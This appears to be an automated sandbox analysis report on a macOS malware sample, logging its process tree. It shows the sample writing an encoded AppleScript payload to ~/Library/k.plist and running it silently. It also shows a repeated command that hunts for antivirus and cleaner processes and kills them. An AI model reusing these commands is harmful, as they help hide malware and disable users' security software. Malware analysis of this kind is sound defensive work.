1\x00\x28\x26\x0A\x00\x12\x5F\x00\x22\x29\x61\x00\x2A\x6B\x2B\x00\x10\x08\x61\x00\x28\x26\x0A\x00\x12\x5F\x00\x22\x29\x61\x00\x2B\x6B\x2B\x00\x10\x08\x61\x00\x28\x26\x0A\x00\x12\x5F\x00\x22\x29\x61\x00\x2C\x6B\x2B\x00\x10\x08\x61\x00\x28\x26\x0A\x00\x12\x5F\x00\x22\x29\x61\x00\x2D\x6B\x2B\x00\x10\x08\x61\x00\x28\x26\x0A\x00\x12\x5F\x00\x22\x29\x61\x00\x2E\x6B\x2B\x00\x10\x08\x61\x00\x28\x26\x61\x00\x28\x26\x1D\x00\x0F\x29\xC7\x61\x00\x2F\x25\x6B\x2B\x00\x0B\x59\x00\x03\x68\x59\x00\x03\x68\x55\x57\x00\x08\x58\x00\x0C\x00\x0D\x68\x59\x00\x03\x68\x5B\x4F\x59\xFD\xFB\x0F\x00\x61\x73\x63\x72\x00\x01\x00\x0D\xFA\xDE\xDE\xAD' > ~/Library/k.plist
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: osascript PID: 550 Parent PID: 548

                                General

                                Start time:11:00:14
                                Start date:15/01/2021
                                Path:/usr/bin/osascript
                                Arguments:n/a
                                File size:43136 bytes
                                MD5 hash:86c0eb9ab6768a4a8e723dcda40bc65a

                                Chronological Activities

                                Analysis Process: sh PID: 550 Parent PID: 548

                                General

                                Start time:11:00:14
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:sh -c osascript ~/Library/k.plist > /dev/null 2> /dev/null &
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: sh PID: 551 Parent PID: 550

                                General

                                Start time:11:00:14
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: osascript PID: 551 Parent PID: 550

                                General

                                Start time:11:00:14
                                Start date:15/01/2021
                                Path:/usr/bin/osascript
                                Arguments:osascript /Users/henry/Library/k.plist
                                File size:43136 bytes
                                MD5 hash:86c0eb9ab6768a4a8e723dcda40bc65a

                                Chronological Activities

                                Analysis Process: osascript PID: 587 Parent PID: 551

                                General

                                Start time:11:00:55
                                Start date:15/01/2021
                                Path:/usr/bin/osascript
                                Arguments:n/a
                                File size:43136 bytes
                                MD5 hash:86c0eb9ab6768a4a8e723dcda40bc65a

                                Chronological Activities

                                Analysis Process: sh PID: 587 Parent PID: 551

                                General

                                Start time:11:00:55
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: sh PID: 588 Parent PID: 587

                                General

                                Start time:11:00:55
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: ps PID: 588 Parent PID: 587

                                General

                                Start time:11:00:55
                                Start date:15/01/2021
                                Path:/bin/ps
                                Arguments:ps ax
                                File size:51280 bytes
                                MD5 hash:792e18b1417ac1f184680d2423206e4f

                                Chronological Activities

                                Analysis Process: sh PID: 589 Parent PID: 587

                                General

                                Start time:11:00:55
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: grep PID: 589 Parent PID: 587

                                General

                                Start time:11:00:55
                                Start date:15/01/2021
                                Path:/usr/bin/grep
                                Arguments:grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac
                                File size:33936 bytes
                                MD5 hash:2b3efb273296881708ea2914c612e0eb

                                Chronological Activities

                                Analysis Process: sh PID: 590 Parent PID: 587

                                General

                                Start time:11:00:55
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: grep PID: 590 Parent PID: 587

                                General

                                Start time:11:00:55
                                Start date:15/01/2021
                                Path:/usr/bin/grep
                                Arguments:grep -v grep
                                File size:33936 bytes
                                MD5 hash:2b3efb273296881708ea2914c612e0eb

                                Chronological Activities

                                Analysis Process: sh PID: 591 Parent PID: 587

                                General

                                Start time:11:00:55
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: awk PID: 591 Parent PID: 587

                                General

                                Start time:11:00:55
                                Start date:15/01/2021
                                Path:/usr/bin/awk
                                Arguments:awk {print $1}
                                File size:112592 bytes
                                MD5 hash:fa9db7f6c4a0287ceb78a3bd34524ada

                                Chronological Activities

                                Analysis Process: osascript PID: 592 Parent PID: 551

                                General

                                Start time:11:00:55
                                Start date:15/01/2021
                                Path:/usr/bin/osascript
                                Arguments:n/a
                                File size:43136 bytes
                                MD5 hash:86c0eb9ab6768a4a8e723dcda40bc65a

                                Chronological Activities

                                Analysis Process: sh PID: 592 Parent PID: 551

                                General

                                Start time:11:00:55
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:sh -c kill -9 360
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: osascript PID: 597 Parent PID: 551

                                General

                                Start time:11:01:09
                                Start date:15/01/2021
                                Path:/usr/bin/osascript
                                Arguments:n/a
                                File size:43136 bytes
                                MD5 hash:86c0eb9ab6768a4a8e723dcda40bc65a

                                Chronological Activities

                                Analysis Process: sh PID: 597 Parent PID: 551

                                General

                                Start time:11:01:09
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: sh PID: 598 Parent PID: 597

                                General

                                Start time:11:01:09
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: ps PID: 598 Parent PID: 597

                                General

                                Start time:11:01:09
                                Start date:15/01/2021
                                Path:/bin/ps
                                Arguments:ps ax
                                File size:51280 bytes
                                MD5 hash:792e18b1417ac1f184680d2423206e4f

                                Chronological Activities

                                Analysis Process: sh PID: 599 Parent PID: 597

                                General

                                Start time:11:01:09
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: grep PID: 599 Parent PID: 597

                                General

                                Start time:11:01:09
                                Start date:15/01/2021
                                Path:/usr/bin/grep
                                Arguments:grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac
                                File size:33936 bytes
                                MD5 hash:2b3efb273296881708ea2914c612e0eb

                                Chronological Activities

                                Analysis Process: sh PID: 600 Parent PID: 597

                                General

                                Start time:11:01:09
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: grep PID: 600 Parent PID: 597

                                General

                                Start time:11:01:09
                                Start date:15/01/2021
                                Path:/usr/bin/grep
                                Arguments:grep -v grep
                                File size:33936 bytes
                                MD5 hash:2b3efb273296881708ea2914c612e0eb

                                Chronological Activities

                                Analysis Process: sh PID: 601 Parent PID: 597

                                General

                                Start time:11:01:09
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: awk PID: 601 Parent PID: 597

                                General

                                Start time:11:01:09
                                Start date:15/01/2021
                                Path:/usr/bin/awk
                                Arguments:awk {print $1}
                                File size:112592 bytes
                                MD5 hash:fa9db7f6c4a0287ceb78a3bd34524ada

                                Chronological Activities

                                Analysis Process: osascript PID: 603 Parent PID: 551

                                General

                                Start time:11:01:42
                                Start date:15/01/2021
                                Path:/usr/bin/osascript
                                Arguments:n/a
                                File size:43136 bytes
                                MD5 hash:86c0eb9ab6768a4a8e723dcda40bc65a

                                Chronological Activities

                                Analysis Process: sh PID: 603 Parent PID: 551

                                General

                                Start time:11:01:42
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: sh PID: 604 Parent PID: 603

                                General

                                Start time:11:01:42
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: ps PID: 604 Parent PID: 603

                                General

                                Start time:11:01:42
                                Start date:15/01/2021
                                Path:/bin/ps
                                Arguments:ps ax
                                File size:51280 bytes
                                MD5 hash:792e18b1417ac1f184680d2423206e4f

                                Chronological Activities

                                Analysis Process: sh PID: 605 Parent PID: 603

                                General

                                Start time:11:01:42
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: grep PID: 605 Parent PID: 603

                                General

                                Start time:11:01:42
                                Start date:15/01/2021
                                Path:/usr/bin/grep
                                Arguments:grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac
                                File size:33936 bytes
                                MD5 hash:2b3efb273296881708ea2914c612e0eb

                                Chronological Activities

                                Analysis Process: sh PID: 606 Parent PID: 603

                                General

                                Start time:11:01:42
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: grep PID: 606 Parent PID: 603

                                General

                                Start time:11:01:42
                                Start date:15/01/2021
                                Path:/usr/bin/grep
                                Arguments:grep -v grep
                                File size:33936 bytes
                                MD5 hash:2b3efb273296881708ea2914c612e0eb

                                Chronological Activities

                                Analysis Process: sh PID: 607 Parent PID: 603

                                General

                                Start time:11:01:42
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: awk PID: 607 Parent PID: 603

                                General

                                Start time:11:01:42
                                Start date:15/01/2021
                                Path:/usr/bin/awk
                                Arguments:awk {print $1}
                                File size:112592 bytes
                                MD5 hash:fa9db7f6c4a0287ceb78a3bd34524ada

                                Chronological Activities

                                Analysis Process: osascript PID: 608 Parent PID: 551

                                General

                                Start time:11:01:56
                                Start date:15/01/2021
                                Path:/usr/bin/osascript
                                Arguments:n/a
                                File size:43136 bytes
                                MD5 hash:86c0eb9ab6768a4a8e723dcda40bc65a

                                Chronological Activities

                                Analysis Process: sh PID: 608 Parent PID: 551

                                General

                                Start time:11:01:56
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: sh PID: 609 Parent PID: 608

                                General

                                Start time:11:01:56
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: ps PID: 609 Parent PID: 608

                                General

                                Start time:11:01:56
                                Start date:15/01/2021
                                Path:/bin/ps
                                Arguments:ps ax
                                File size:51280 bytes
                                MD5 hash:792e18b1417ac1f184680d2423206e4f

                                Chronological Activities

                                Analysis Process: sh PID: 610 Parent PID: 608

                                General

                                Start time:11:01:56
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: grep PID: 610 Parent PID: 608

                                General

                                Start time:11:01:56
                                Start date:15/01/2021
                                Path:/usr/bin/grep
                                Arguments:grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac
                                File size:33936 bytes
                                MD5 hash:2b3efb273296881708ea2914c612e0eb

                                Chronological Activities

                                Analysis Process: sh PID: 611 Parent PID: 608

                                General

                                Start time:11:01:56
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: grep PID: 611 Parent PID: 608

                                General

                                Start time:11:01:56
                                Start date:15/01/2021
                                Path:/usr/bin/grep
                                Arguments:grep -v grep
                                File size:33936 bytes
                                MD5 hash:2b3efb273296881708ea2914c612e0eb

                                Chronological Activities

                                Analysis Process: sh PID: 612 Parent PID: 608

                                General

                                Start time:11:01:56
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: awk PID: 612 Parent PID: 608

                                General

                                Start time:11:01:56
                                Start date:15/01/2021
                                Path:/usr/bin/awk
                                Arguments:awk {print $1}
                                File size:112592 bytes
                                MD5 hash:fa9db7f6c4a0287ceb78a3bd34524ada

                                Chronological Activities

                                Analysis Process: osascript PID: 614 Parent PID: 551

                                General

                                Start time:11:02:28
                                Start date:15/01/2021
                                Path:/usr/bin/osascript
                                Arguments:n/a
                                File size:43136 bytes
                                MD5 hash:86c0eb9ab6768a4a8e723dcda40bc65a

                                Chronological Activities

                                Analysis Process: sh PID: 614 Parent PID: 551

                                General

                                Start time:11:02:28
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: sh PID: 615 Parent PID: 614

                                General

                                Start time:11:02:28
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: ps PID: 615 Parent PID: 614

                                General

                                Start time:11:02:28
                                Start date:15/01/2021
                                Path:/bin/ps
                                Arguments:ps ax
                                File size:51280 bytes
                                MD5 hash:792e18b1417ac1f184680d2423206e4f

                                Chronological Activities

                                Analysis Process: sh PID: 616 Parent PID: 614

                                General

                                Start time:11:02:28
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: grep PID: 616 Parent PID: 614

                                General

                                Start time:11:02:28
                                Start date:15/01/2021
                                Path:/usr/bin/grep
                                Arguments:grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac
                                File size:33936 bytes
                                MD5 hash:2b3efb273296881708ea2914c612e0eb

                                Chronological Activities

                                Analysis Process: sh PID: 617 Parent PID: 614

                                General

                                Start time:11:02:28
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: grep PID: 617 Parent PID: 614

                                General

                                Start time:11:02:28
                                Start date:15/01/2021
                                Path:/usr/bin/grep
                                Arguments:grep -v grep
                                File size:33936 bytes
                                MD5 hash:2b3efb273296881708ea2914c612e0eb

                                Chronological Activities

                                Analysis Process: sh PID: 618 Parent PID: 614

                                General

                                Start time:11:02:28
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: awk PID: 618 Parent PID: 614

                                General

                                Start time:11:02:28
                                Start date:15/01/2021
                                Path:/usr/bin/awk
                                Arguments:awk {print $1}
                                File size:112592 bytes
                                MD5 hash:fa9db7f6c4a0287ceb78a3bd34524ada

                                Chronological Activities

                                Analysis Process: osascript PID: 619 Parent PID: 551

                                General

                                Start time:11:02:43
                                Start date:15/01/2021
                                Path:/usr/bin/osascript
                                Arguments:n/a
                                File size:43136 bytes
                                MD5 hash:86c0eb9ab6768a4a8e723dcda40bc65a

                                Chronological Activities

                                Analysis Process: sh PID: 619 Parent PID: 551

                                General

                                Start time:11:02:43
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: sh PID: 620 Parent PID: 619

                                General

                                Start time:11:02:43
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: ps PID: 620 Parent PID: 619

                                General

                                Start time:11:02:43
                                Start date:15/01/2021
                                Path:/bin/ps
                                Arguments:ps ax
                                File size:51280 bytes
                                MD5 hash:792e18b1417ac1f184680d2423206e4f

                                Chronological Activities

                                Analysis Process: sh PID: 621 Parent PID: 619

                                General

                                Start time:11:02:43
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: grep PID: 621 Parent PID: 619

                                General

                                Start time:11:02:43
                                Start date:15/01/2021
                                Path:/usr/bin/grep
                                Arguments:grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac
                                File size:33936 bytes
                                MD5 hash:2b3efb273296881708ea2914c612e0eb

                                Chronological Activities

                                Analysis Process: sh PID: 622 Parent PID: 619

                                General

                                Start time:11:02:43
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: grep PID: 622 Parent PID: 619

                                General

                                Start time:11:02:43
                                Start date:15/01/2021
                                Path:/usr/bin/grep
                                Arguments:grep -v grep
                                File size:33936 bytes
                                MD5 hash:2b3efb273296881708ea2914c612e0eb

                                Chronological Activities

                                Analysis Process: sh PID: 623 Parent PID: 619

                                General

                                Start time:11:02:43
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: awk PID: 623 Parent PID: 619

                                General

                                Start time:11:02:43
                                Start date:15/01/2021
                                Path:/usr/bin/awk
                                Arguments:awk {print $1}
                                File size:112592 bytes
                                MD5 hash:fa9db7f6c4a0287ceb78a3bd34524ada

                                Chronological Activities

                                Analysis Process: osascript PID: 625 Parent PID: 551

                                General

                                Start time:11:03:09
                                Start date:15/01/2021
                                Path:/usr/bin/osascript
                                Arguments:n/a
                                File size:43136 bytes
                                MD5 hash:86c0eb9ab6768a4a8e723dcda40bc65a

                                Chronological Activities

                                Analysis Process: sh PID: 625 Parent PID: 551

                                General

                                Start time:11:03:09
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: sh PID: 626 Parent PID: 625

                                General

                                Start time:11:03:09
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: ps PID: 626 Parent PID: 625

                                General

                                Start time:11:03:09
                                Start date:15/01/2021
                                Path:/bin/ps
                                Arguments:ps ax
                                File size:51280 bytes
                                MD5 hash:792e18b1417ac1f184680d2423206e4f

                                Chronological Activities

                                Analysis Process: sh PID: 627 Parent PID: 625

                                General

                                Start time:11:03:09
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: grep PID: 627 Parent PID: 625

                                General

                                Start time:11:03:09
                                Start date:15/01/2021
                                Path:/usr/bin/grep
                                Arguments:grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac
                                File size:33936 bytes
                                MD5 hash:2b3efb273296881708ea2914c612e0eb

                                Chronological Activities

                                Analysis Process: sh PID: 628 Parent PID: 625

                                General

                                Start time:11:03:09
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: grep PID: 628 Parent PID: 625

                                General

                                Start time:11:03:09
                                Start date:15/01/2021
                                Path:/usr/bin/grep
                                Arguments:grep -v grep
                                File size:33936 bytes
                                MD5 hash:2b3efb273296881708ea2914c612e0eb

                                Chronological Activities

                                Analysis Process: sh PID: 629 Parent PID: 625

                                General

                                Start time:11:03:09
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: awk PID: 629 Parent PID: 625

                                General

                                Start time:11:03:09
                                Start date:15/01/2021
                                Path:/usr/bin/awk
                                Arguments:awk {print $1}
                                File size:112592 bytes
                                MD5 hash:fa9db7f6c4a0287ceb78a3bd34524ada

                                Chronological Activities

                                Analysis Process: osascript PID: 630 Parent PID: 551

                                General

                                Start time:11:03:23
                                Start date:15/01/2021
                                Path:/usr/bin/osascript
                                Arguments:n/a
                                File size:43136 bytes
                                MD5 hash:86c0eb9ab6768a4a8e723dcda40bc65a

                                Chronological Activities

                                Analysis Process: sh PID: 630 Parent PID: 551

                                General

                                Start time:11:03:23
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: sh PID: 631 Parent PID: 630

                                General

                                Start time:11:03:23
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: ps PID: 631 Parent PID: 630

                                General

                                Start time:11:03:23
                                Start date:15/01/2021
                                Path:/bin/ps
                                Arguments:ps ax
                                File size:51280 bytes
                                MD5 hash:792e18b1417ac1f184680d2423206e4f

                                Chronological Activities

                                Analysis Process: sh PID: 632 Parent PID: 630

                                General

                                Start time:11:03:23
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: grep PID: 632 Parent PID: 630

                                General

                                Start time:11:03:23
                                Start date:15/01/2021
                                Path:/usr/bin/grep
                                Arguments:grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac
                                File size:33936 bytes
                                MD5 hash:2b3efb273296881708ea2914c612e0eb

                                Chronological Activities

                                Analysis Process: sh PID: 633 Parent PID: 630

                                General

                                Start time:11:03:23
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: grep PID: 633 Parent PID: 630

                                General

                                Start time:11:03:23
                                Start date:15/01/2021
                                Path:/usr/bin/grep
                                Arguments:grep -v grep
                                File size:33936 bytes
                                MD5 hash:2b3efb273296881708ea2914c612e0eb

                                Chronological Activities

                                Analysis Process: sh PID: 634 Parent PID: 630

                                General

                                Start time:11:03:23
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: awk PID: 634 Parent PID: 630

                                General

                                Start time:11:03:23
                                Start date:15/01/2021
                                Path:/usr/bin/awk
                                Arguments:awk {print $1}
                                File size:112592 bytes
                                MD5 hash:fa9db7f6c4a0287ceb78a3bd34524ada

                                Chronological Activities

                                Analysis Process: osascript PID: 636 Parent PID: 551

                                General

                                Start time:11:03:50
                                Start date:15/01/2021
                                Path:/usr/bin/osascript
                                Arguments:n/a
                                File size:43136 bytes
                                MD5 hash:86c0eb9ab6768a4a8e723dcda40bc65a

                                Chronological Activities

                                Analysis Process: sh PID: 636 Parent PID: 551

                                General

                                Start time:11:03:50
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: sh PID: 637 Parent PID: 636

                                General

                                Start time:11:03:50
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: ps PID: 637 Parent PID: 636

                                General

                                Start time:11:03:50
                                Start date:15/01/2021
                                Path:/bin/ps
                                Arguments:ps ax
                                File size:51280 bytes
                                MD5 hash:792e18b1417ac1f184680d2423206e4f

                                Chronological Activities

                                Analysis Process: sh PID: 638 Parent PID: 636

                                General

                                Start time:11:03:50
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: grep PID: 638 Parent PID: 636

                                General

                                Start time:11:03:50
                                Start date:15/01/2021
                                Path:/usr/bin/grep
                                Arguments:grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac
                                File size:33936 bytes
                                MD5 hash:2b3efb273296881708ea2914c612e0eb

                                Chronological Activities

                                Analysis Process: sh PID: 639 Parent PID: 636

                                General

                                Start time:11:03:50
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: grep PID: 639 Parent PID: 636

                                General

                                Start time:11:03:50
                                Start date:15/01/2021
                                Path:/usr/bin/grep
                                Arguments:grep -v grep
                                File size:33936 bytes
                                MD5 hash:2b3efb273296881708ea2914c612e0eb

                                Chronological Activities

                                Analysis Process: sh PID: 640 Parent PID: 636

                                General

                                Start time:11:03:50
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: awk PID: 640 Parent PID: 636

                                General

                                Start time:11:03:50
                                Start date:15/01/2021
                                Path:/usr/bin/awk
                                Arguments:awk {print $1}
                                File size:112592 bytes
                                MD5 hash:fa9db7f6c4a0287ceb78a3bd34524ada

                                Chronological Activities

                                Analysis Process: osascript PID: 641 Parent PID: 551

                                General

                                Start time:11:04:04
                                Start date:15/01/2021
                                Path:/usr/bin/osascript
                                Arguments:n/a
                                File size:43136 bytes
                                MD5 hash:86c0eb9ab6768a4a8e723dcda40bc65a

                                Chronological Activities

                                Analysis Process: sh PID: 641 Parent PID: 551

                                General

                                Start time:11:04:04
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: sh PID: 642 Parent PID: 641

                                General

                                Start time:11:04:04
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: ps PID: 642 Parent PID: 641

                                General

                                Start time:11:04:04
                                Start date:15/01/2021
                                Path:/bin/ps
                                Arguments:ps ax
                                File size:51280 bytes
                                MD5 hash:792e18b1417ac1f184680d2423206e4f

                                Chronological Activities

                                Analysis Process: sh PID: 643 Parent PID: 641

                                General

                                Start time:11:04:04
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

